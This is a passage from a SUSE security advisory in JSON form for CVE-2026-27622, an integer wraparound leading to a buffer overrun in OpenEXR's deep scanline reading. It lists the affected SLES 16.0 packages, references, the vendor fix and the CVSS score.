"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.aarch64"
},
"product_reference": "openexr-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "openexr-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.s390x"
},
"product_reference": "openexr-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.x86_64"
},
"product_reference": "openexr-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.2.2-160000.5.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
},
"product_reference": "openexr-doc-3.2.2-160000.5.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27622"
}
],
"notes": [
{
"category": "general",
"text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-doc-3.2.2-160000.5.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27622",
"url": "https://www.suse.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "SUSE Bug 1259177 for CVE-2026-27622",
"url": "https://bugzilla.suse.com/1259177"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-doc-3.2.2-160000.5.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server 16.0:openexr-doc-3.2.2-160000.5.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
}
],
"threats": [
{
